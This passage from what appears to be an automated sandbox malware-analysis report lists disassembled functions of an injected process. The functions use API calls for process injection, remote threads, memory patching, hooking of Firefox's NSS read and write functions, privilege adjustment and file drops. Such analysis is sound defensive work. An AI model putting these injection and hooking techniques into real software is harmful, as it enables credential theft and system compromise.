HTTP/1.1, xrefs: 011A50DF

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011AC5CA, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 64

APIs

Part of subcall function 011A262D: WaitForSingleObject.KERNEL32(00000000,0119776D), ref: 011A2635

LdrGetDllHandle.NTDLL(?,00000000,?,?), ref: 011AC5ED
LdrLoadDll.NTDLL(?,?,?,?), ref: 011AC5FD
EnterCriticalSection.KERNEL32(011B400C), ref: 011AC620
lstrcmpiW.KERNEL32(?,nspr4.dll), ref: 011AC640
lstrcmpiW.KERNEL32(?,nss3.dll), ref: 011AC64C

Part of subcall function 0119C103: GetModuleHandleW.KERNEL32(nss3.dll,00000000,76C619C1,00000000,011A20A9), ref: 0119C111
Part of subcall function 0119C103: GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket,00000000,76C619C1,00000000,011A20A9), ref: 0119C125
Part of subcall function 0119C103: GetProcAddress.KERNEL32(00000000,PR_Close), ref: 0119C132
Part of subcall function 0119C103: GetProcAddress.KERNEL32(00000000,PR_Read), ref: 0119C13F
Part of subcall function 0119C103: GetProcAddress.KERNEL32(00000000,PR_Write), ref: 0119C14C

LeaveCriticalSection.KERNEL32(011B400C), ref: 011AC669

Strings

nspr4.dll, xrefs: 011AC63A
nss3.dll, xrefs: 011AC646

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 01199489, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 156

APIs

Part of subcall function 011A74DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,01197194,?,?,00000104,.exe,00000000), ref: 011A74F4
Part of subcall function 011A74DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,01197194,?,?,00000104), ref: 011A7575

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 011994EF

Part of subcall function 0119929D: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 011992D4
Part of subcall function 0119929D: StrStrIW.SHLWAPI(?,?), ref: 0119935C
Part of subcall function 0119929D: StrStrIW.SHLWAPI(?,?), ref: 0119936D
Part of subcall function 0119929D: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 01199389
Part of subcall function 0119929D: GetPrivateProfileStringW.KERNEL32(?,?,00000000,-000001FE,000000FF,?), ref: 011993A7
Part of subcall function 0119929D: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 011993C1

PathRemoveFileSpecW.SHLWAPI(?), ref: 0119950C
SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 01199582

Part of subcall function 011A8AE4: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00000000), ref: 011A8B23
Part of subcall function 011A8AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 011A8B4A
Part of subcall function 011A8AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 011A8B94
Part of subcall function 011A8AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 011A8BC1
Part of subcall function 011A8AE4: Sleep.KERNEL32(00000000,?,?), ref: 011A8BF1
Part of subcall function 011A8AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 011A8C1F
Part of subcall function 011A8AE4: FindClose.KERNELBASE(?,?,?,?,00000000), ref: 011A8C31

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104), ref: 0119961F

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Strings

$, xrefs: 01199552
#, xrefs: 01199567
&, xrefs: 01199560

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A69AA, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57

APIs

InitializeSecurityDescriptor.ADVAPI32(011B2C3C,00000001,00000000,011A22ED,?,?,00000000), ref: 011A69B4
SetSecurityDescriptorDacl.ADVAPI32(011B2C3C,00000001,00000000,00000000,?,?,00000000), ref: 011A69C5
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 011A69DB
GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,?,?,?,00000000), ref: 011A69F7
SetSecurityDescriptorSacl.ADVAPI32(011B2C3C,?,?,?,?,?,00000000), ref: 011A6A0B
LocalFree.KERNEL32(00000000,?,?,00000000), ref: 011A6A18

Strings

S:(ML;;NRNWNX;;;LW), xrefs: 011A69D6

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A31CC, Relevance: 12.1, APIs: 8, Instructions: 114

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 011A31ED
Process32FirstW.KERNEL32(000001E6,?), ref: 011A3216

Part of subcall function 011A245B: CreateMutexW.KERNELBASE(011B2C30,00000001,?,011B2E70,76C605D7,?,00000002,?,76C605D7), ref: 011A24A3
Part of subcall function 011A245B: GetLastError.KERNEL32 ref: 011A24AF
Part of subcall function 011A245B: CloseHandle.KERNEL32(00000000), ref: 011A24BD

OpenProcess.KERNEL32(00000400,00000000,?,?,?,76C605D7,00000000), ref: 011A3271
CloseHandle.KERNEL32(?), ref: 011A330E

Part of subcall function 011A49D2: OpenProcessToken.ADVAPI32(?,00000008,?,76C61857,?,?,011A2326,000000FF,011B2C08,?,?,00000000), ref: 011A49E2
Part of subcall function 011A49D2: GetTokenInformation.KERNELBASE(?,0000000C,00000000,00000004,00000000,?,?,?,011A2326,000000FF,011B2C08), ref: 011A4A0E
Part of subcall function 011A49D2: CloseHandle.KERNEL32(?), ref: 011A4A23

CloseHandle.KERNEL32(00000000), ref: 011A328E
GetLengthSid.ADVAPI32(00000000,?,76C605D7,00000000), ref: 011A32A1

Part of subcall function 011A3346: HeapAlloc.KERNEL32(00000008,-00000003,011A36F5,?,?,00000000,011A41E1,?,011A2070,?,?,?,011A4191,?,?,?), ref: 011A3368
Part of subcall function 011A3346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,011A36F5,?,?,00000000,011A41E1,?,011A2070,?,?,?,011A4191,?,?), ref: 011A3379

Part of subcall function 011A3048: OpenProcess.KERNEL32(0000047A,00000000,?,?,00000000), ref: 011A3157
Part of subcall function 011A3048: CreateRemoteThread.KERNEL32(00000000,00000000,00000000,-02355903,00000000,00000000,00000000), ref: 011A3185
Part of subcall function 011A3048: WaitForSingleObject.KERNEL32(00000000,00002710), ref: 011A3198
Part of subcall function 011A3048: CloseHandle.KERNEL32(?), ref: 011A31A1
Part of subcall function 011A3048: VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000,?,?,00000000), ref: 011A31B5
Part of subcall function 011A3048: CloseHandle.KERNEL32(00000000), ref: 011A31BC

Process32NextW.KERNEL32(000001E6,0000022C), ref: 011A331A
CloseHandle.KERNEL32(000001E6), ref: 011A332B

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A8AE4, Relevance: 10.6, APIs: 7, Instructions: 109

APIs

Part of subcall function 011A8C40: PathCombineW.SHLWAPI(011A1F45,011A1F45,?), ref: 011A8C5F

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00000000), ref: 011A8B23
WaitForSingleObject.KERNEL32(00000000,00000000), ref: 011A8B4A

Part of subcall function 011A8AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 011A8B94
Part of subcall function 011A8AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 011A8BC1
Part of subcall function 011A8AE4: Sleep.KERNEL32(00000000,?,?), ref: 011A8BF1

FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 011A8C1F
FindClose.KERNELBASE(?,?,?,?,00000000), ref: 011A8C31

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A4B0F, Relevance: 10.6, APIs: 7, Instructions: 74

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,?,00000000,?,?,?,011A1E08,00000000,011A22ED,?,?,00000000), ref: 011A4B1F
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,76C61857,?,?,?,011A1E08,00000000,011A22ED,?,?,00000000), ref: 011A4B3F
GetLastError.KERNEL32(?,?,?,011A1E08,00000000,011A22ED,?,?,00000000), ref: 011A4B45

Part of subcall function 011A338B: HeapAlloc.KERNEL32(00000008,-00000004,011A4B59,00000000,?,?,?,011A1E08,00000000,011A22ED,?,?,00000000), ref: 011A339C

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,00000000,?,?,?,011A1E08,00000000,011A22ED,?,?,00000000), ref: 011A4B6C
GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,011A1E08,00000000,011A22ED,?,?,00000000), ref: 011A4B74
GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,011A1E08,00000000,011A22ED,?,?,00000000), ref: 011A4B8B

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

CloseHandle.KERNEL32(?), ref: 011A4BB6

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A4A87, Relevance: 10.6, APIs: 7, Instructions: 52

APIs

GetCurrentThread.KERNEL32(00000020,00000000,011AC9A1,00000000,?,?,?,?,011AC9A1,SeTcbPrivilege), ref: 011A4A97
OpenThreadToken.ADVAPI32(00000000,?,?,?,?,011AC9A1,SeTcbPrivilege), ref: 011A4A9E
OpenProcessToken.ADVAPI32(000000FF,00000020,011AC9A1,?,?,?,?,011AC9A1,SeTcbPrivilege), ref: 011A4AB0
LookupPrivilegeValueW.ADVAPI32(00000000,011AC9A1,?), ref: 011A4AD4
AdjustTokenPrivileges.KERNELBASE(011AC9A1,00000000,00000001,00000000,00000000,00000000), ref: 011A4AE9
GetLastError.KERNEL32 ref: 011A4AF3
CloseHandle.KERNEL32(011AC9A1), ref: 011A4B02

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 01195ECF, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45

APIs

PathRemoveFileSpecW.SHLWAPI(C:\Users\admin\AppData\Roaming\Yfheor), ref: 01195F07
PathRenameExtensionW.SHLWAPI(?,.tmp), ref: 01195F23

Part of subcall function 011A89C2: PathSkipRootW.SHLWAPI(?), ref: 011A89CD
Part of subcall function 011A89C2: GetFileAttributesW.KERNEL32(?,?,00000000,011AD261,?,?,?,?,?), ref: 011A89F5
Part of subcall function 011A89C2: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,011AD261,?,?,?,?,?), ref: 011A8A03

Part of subcall function 011A6A3C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,?,00000000), ref: 011A6A5B
Part of subcall function 011A6A3C: GetSecurityDescriptorSacl.ADVAPI32(?,00000000,?,00000000), ref: 011A6A77
Part of subcall function 011A6A3C: SetNamedSecurityInfoW.ADVAPI32(?,00000001,00000010,00000000,00000000,00000000,?), ref: 011A6A8E
Part of subcall function 011A6A3C: LocalFree.KERNEL32(?), ref: 011A6A9D

GetFileAttributesW.KERNEL32(C:\Users\admin\AppData\Roaming\Yfheor\vyyno.agx,C:\Users\admin\AppData\Roaming\Yfheor,C:\Users\admin\AppData\Roaming\Yfheor,?,?,01196527,00000000,?,00000000,00000330,?,?,00000102), ref: 01195F46

Part of subcall function 011A2828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 011A28A1

Strings

C:\Users\admin\AppData\Roaming\Yfheor\vyyno.agx, xrefs: 01195ECF, 01195ED9, 01195EF6, 01195F45, 01195F51
.tmp, xrefs: 01195F1D
C:\Users\admin\AppData\Roaming\Yfheor, xrefs: 01195EDE, 01195EF7, 01195EFF, 01195F39, 01195F3F

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A5403, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44

APIs

LoadLibraryA.KERNEL32(urlmon.dll), ref: 011A5414
GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 011A5427
ObtainUserAgentString.URLMON(00000000,?,00000000,?), ref: 011A544C
FreeLibrary.KERNEL32(?), ref: 011A5479

Strings

ObtainUserAgentString, xrefs: 011A5421
urlmon.dll, xrefs: 011A540D

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A6A3C, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43

APIs

Part of subcall function 011A4A87: GetCurrentThread.KERNEL32(00000020,00000000,011AC9A1,00000000,?,?,?,?,011AC9A1,SeTcbPrivilege), ref: 011A4A97
Part of subcall function 011A4A87: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,011AC9A1,SeTcbPrivilege), ref: 011A4A9E
Part of subcall function 011A4A87: OpenProcessToken.ADVAPI32(000000FF,00000020,011AC9A1,?,?,?,?,011AC9A1,SeTcbPrivilege), ref: 011A4AB0
Part of subcall function 011A4A87: LookupPrivilegeValueW.ADVAPI32(00000000,011AC9A1,?), ref: 011A4AD4
Part of subcall function 011A4A87: AdjustTokenPrivileges.KERNELBASE(011AC9A1,00000000,00000001,00000000,00000000,00000000), ref: 011A4AE9
Part of subcall function 011A4A87: GetLastError.KERNEL32 ref: 011A4AF3
Part of subcall function 011A4A87: CloseHandle.KERNEL32(011AC9A1), ref: 011A4B02

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,?,00000000), ref: 011A6A5B
GetSecurityDescriptorSacl.ADVAPI32(?,00000000,?,00000000), ref: 011A6A77
SetNamedSecurityInfoW.ADVAPI32(?,00000001,00000010,00000000,00000000,00000000,?), ref: 011A6A8E
LocalFree.KERNEL32(?), ref: 011A6A9D

Strings

SeSecurityPrivilege, xrefs: 011A6A43
S:(ML;CIOI;NRNWNX;;;LW), xrefs: 011A6A56

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A85D0, Relevance: 9.1, APIs: 6, Instructions: 68

APIs

CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 011A85F5
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,011A2D27,?,?,00000000), ref: 011A8608
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,011A2D27,?,?,00000000), ref: 011A8630
ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 011A8648
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,011A2D27,?,?,00000000), ref: 011A8662
CloseHandle.KERNEL32(?), ref: 011A866B

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A4660, Relevance: 9.1, APIs: 6, Instructions: 53

APIs

CryptAcquireContextW.ADVAPI32(011A8C87,00000000,00000000,00000001,F0000040,?,011A8C87,?,00000030,?,?,?,011A91A0,SOFTWARE\Microsoft\Xyuxy), ref: 011A4679
CryptCreateHash.ADVAPI32(011A8C87,00008003,00000000,00000000,00000030,?,011A8C87,?,00000030,?,?,?,011A91A0,SOFTWARE\Microsoft\Xyuxy), ref: 011A4691
CryptHashData.ADVAPI32(00000030,00000010,011A8C87,00000000,?,011A8C87), ref: 011A46AD
CryptGetHashParam.ADVAPI32(00000030,00000002,00000030,00000010,00000000,?,011A8C87), ref: 011A46C5
CryptDestroyHash.ADVAPI32(00000030,?,011A8C87), ref: 011A46DC
CryptReleaseContext.ADVAPI32(011A8C87,00000000,?,011A8C87,?,00000030,?,?,?,011A91A0,SOFTWARE\Microsoft\Xyuxy), ref: 011A46E6

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A9224, Relevance: 7.6, APIs: 5, Instructions: 111

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000004,00000080,00000000), ref: 011A9245

Part of subcall function 011A86EF: GetFileSizeEx.KERNEL32(?,?,?,?,?,01196588,00000000), ref: 011A86FB

ReadFile.KERNEL32(?,?,00000005,00000000,00000000), ref: 011A9286
CloseHandle.KERNEL32(?), ref: 011A9292
ReadFile.KERNEL32(?,?,00000005,00000005,00000000), ref: 011A9301
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 011A9327

Part of subcall function 011A869F: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 011A86B1

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A7BF7, Relevance: 7.6, APIs: 5, Instructions: 108

APIs

Part of subcall function 011A7BB2: VirtualQueryEx.KERNEL32(000000FF,DB84D88A,?,0000001C,0119C168,DB84D88A,?,?,?,0119BD76,00000000,00000000,00000004,?,?,0119C160), ref: 011A7BC7

VirtualProtectEx.KERNELBASE(000000FF,0119C160,0000001E,00000040,011B2360,0119C158,00000004,?,?,?,?,0119BE97,6A011B23,00000000), ref: 011A7C24
ReadProcessMemory.KERNELBASE(000000FF,0119C160,?,0000001E,00000000,?,00000090,00000023,?,?,?,?,0119BE97,6A011B23,00000000), ref: 011A7C4B
WriteProcessMemory.KERNELBASE(000000FF,?,?,00000005,00000000,?,00000000,00000000), ref: 011A7CC5
WriteProcessMemory.KERNELBASE(000000FF,?,000000E9,00000005,00000000), ref: 011A7CED
VirtualProtectEx.KERNELBASE(000000FF,0119C160,0000001E,011B2360,011B2360,?,?,?,?,0119BE97,6A011B23,00000000,?,?,0119C160,011B2360), ref: 011A7D05

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 0119BBD5, Relevance: 7.6, APIs: 5, Instructions: 72

APIs

GetCurrentThread.KERNEL32(00000000), ref: 0119BBE0
SetThreadPriority.KERNEL32(00000000), ref: 0119BBE7

Part of subcall function 011A2507: CreateMutexW.KERNELBASE(011B2C30,00000000,?,?,?,?,?), ref: 011A2528

Part of subcall function 011A2828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 011A28A1

PathQuoteSpacesW.SHLWAPI(?), ref: 0119BC2A

Part of subcall function 011A262D: WaitForSingleObject.KERNEL32(00000000,0119776D), ref: 011A2635

WaitForSingleObject.KERNEL32(000000C8), ref: 0119BC62

Part of subcall function 011A763A: RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00000002,00000000,00000004,00000000,80000001,?,?,011A9EAB,?,?,00000004), ref: 011A7658
Part of subcall function 011A763A: RegSetValueExW.KERNEL32(00000004,00000004,00000000,?,?,011A9EAB,?,?,011A9EAB,?,?,00000004,?,00000004), ref: 011A7672
Part of subcall function 011A763A: RegCloseKey.KERNEL32(00000004,?,?,011A9EAB,?,?,00000004,?,00000004), ref: 011A7681

WaitForSingleObject.KERNEL32(000000C8,?), ref: 0119BC98

Part of subcall function 011A6B8E: ReleaseMutex.KERNEL32(00000000,011A3021,?,?,?), ref: 011A6B92

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 01199009, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94

APIs

Part of subcall function 011A74DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,01197194,?,?,00000104,.exe,00000000), ref: 011A74F4
Part of subcall function 011A74DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,01197194,?,?,00000104), ref: 011A7575

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 0119906B
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 011990BB

Part of subcall function 011A8AE4: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00000000), ref: 011A8B23
Part of subcall function 011A8AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 011A8B4A
Part of subcall function 011A8AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 011A8B94
Part of subcall function 011A8AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 011A8BC1
Part of subcall function 011A8AE4: Sleep.KERNEL32(00000000,?,?), ref: 011A8BF1
Part of subcall function 011A8AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 011A8C1F
Part of subcall function 011A8AE4: FindClose.KERNELBASE(?,?,?,?,00000000), ref: 011A8C31

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

Strings

#, xrefs: 01199093
&, xrefs: 011990A1

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A768E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54

APIs

RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000,SOFTWARE\Microsoft\Xyuxy,00000000), ref: 011A76B3

Part of subcall function 011A338B: HeapAlloc.KERNEL32(00000008,-00000004,011A4B59,00000000,?,?,?,011A1E08,00000000,011A22ED,?,?,00000000), ref: 011A339C

RegQueryValueExW.KERNEL32(?,000000FF,00000000,?,00000000,00000000), ref: 011A76E2

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

RegCloseKey.KERNEL32(?), ref: 011A7702

Strings

SOFTWARE\Microsoft\Xyuxy, xrefs: 011A7699

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A7D14, Relevance: 6.1, APIs: 4, Instructions: 94

APIs

IsBadReadPtr.KERNEL32(01190000,?), ref: 011A7D30
VirtualAllocEx.KERNELBASE(?,00000000,?,00003000,00000040,?,00000000,?,00000000), ref: 011A7D4E
WriteProcessMemory.KERNELBASE(?,?,00000000,?,00000000,01190000,?,?,00000000,?,00000000), ref: 011A7DE0

Part of subcall function 011A33BB: HeapFree.KERNEL32(00000000,00000000,011A4BB2), ref: 011A33CE

VirtualFreeEx.KERNEL32(?,?,00000000,00008000,01190000,?,?,00000000,?,00000000), ref: 011A7E05

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A2542, Relevance: 6.1, APIs: 4, Instructions: 87

APIs

Part of subcall function 011A7D14: IsBadReadPtr.KERNEL32(01190000,?), ref: 011A7D30
Part of subcall function 011A7D14: VirtualAllocEx.KERNELBASE(?,00000000,?,00003000,00000040,?,00000000,?,00000000), ref: 011A7D4E
Part of subcall function 011A7D14: WriteProcessMemory.KERNELBASE(?,?,00000000,?,00000000,01190000,?,?,00000000,?,00000000), ref: 011A7DE0
Part of subcall function 011A7D14: VirtualFreeEx.KERNEL32(?,?,00000000,00008000,01190000,?,?,00000000,?,00000000), ref: 011A7E05

DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 011A2574
WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000,?,?,?,?,011A316D,?,00000000,?,?,00000000), ref: 011A25AB
WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000,?,?,?,?,011A316D,?,00000000,?,?,00000000), ref: 011A25CB

Part of subcall function 011A1D15: DuplicateHandle.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000,00000002), ref: 011A1D3B
Part of subcall function 011A1D15: WriteProcessMemory.KERNELBASE(?,?,00000000,00000004,00000000,?,00000000,?,011A25E9,00000000,?,?,?,?,011A316D,?), ref: 011A1D4F
Part of subcall function 011A1D15: DuplicateHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 011A1D69

VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,?,011A316D,?,00000000), ref: 011A261A

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A984E, Relevance: 6.1, APIs: 4, Instructions: 86

APIs

CoCreateInstance.OLE32(011915B0,00000000,00004401,011915A0,?), ref: 011A9874
#8.OLEAUT32(?,?,?,?,?,?,?,?,?,011985BE,?,?), ref: 011A98C0
#2.OLEAUT32(?,?,?,?,?,?,?,?,?,011985BE,?,?), ref: 011A98D0
#9.OLEAUT32(?,?,?,?,?,?,?,?,?,?,011985BE,?,?), ref: 011A9909

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 011A9372, Relevance: 6.1, APIs: 4, Instructions: 84

APIs

Part of subcall function 011A86BF: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 011A86D4

Part of subcall function 011A869F: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 011A86B1

WriteFile.KERNEL32(?,?,00000005,00000000,00000000), ref: 011A93F3
WriteFile.KERNEL32(?,00000005,00A00000,00000005,00000000), ref: 011A940C
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 011A9430
FlushFileBuffers.KERNEL32(?), ref: 011A9438

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 0119BB5F, Relevance: 6.0, APIs: 4, Instructions: 45

APIs

Part of subcall function 011A2507: CreateMutexW.KERNELBASE(011B2C30,00000000,?,?,?,?,?), ref: 011A2528

Part of subcall function 011A262D: WaitForSingleObject.KERNEL32(00000000,0119776D), ref: 011A2635

GetCurrentThread.KERNEL32(000000F1,19367401,00000001), ref: 0119BB89
SetThreadPriority.KERNEL32(00000000), ref: 0119BB90
WaitForSingleObject.KERNEL32(00001388), ref: 0119BBA8

Part of subcall function 011A31CC: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 011A31ED
Part of subcall function 011A31CC: Process32FirstW.KERNEL32(000001E6,?), ref: 011A3216
Part of subcall function 011A31CC: OpenProcess.KERNEL32(00000400,00000000,?,?,?,76C605D7,00000000), ref: 011A3271
Part of subcall function 011A31CC: CloseHandle.KERNEL32(00000000), ref: 011A328E
Part of subcall function 011A31CC: GetLengthSid.ADVAPI32(00000000,?,76C605D7,00000000), ref: 011A32A1
Part of subcall function 011A31CC: CloseHandle.KERNEL32(?), ref: 011A330E
Part of subcall function 011A31CC: Process32NextW.KERNEL32(000001E6,0000022C), ref: 011A331A
Part of subcall function 011A31CC: CloseHandle.KERNEL32(000001E6), ref: 011A332B

WaitForSingleObject.KERNEL32(00001388), ref: 0119BBBD

Part of subcall function 011A6B8E: ReleaseMutex.KERNEL32(00000000,011A3021,?,?,?), ref: 011A6B92

Memory Dump Source

Source File: 00000002.00000002.2016171365.01190000.00000040.sdmp, Offset: 01190000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1190000_taskhost.jbxd

Function 01197EF9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93

APIs

CoCreateInstance.OLE32(011916C0,00000000,00004401,011916D0,?), ref: 01197F29
CoCreateInstance.OLE32(01191690,00000000,00004401,011916A0,?), ref: 01197F7C

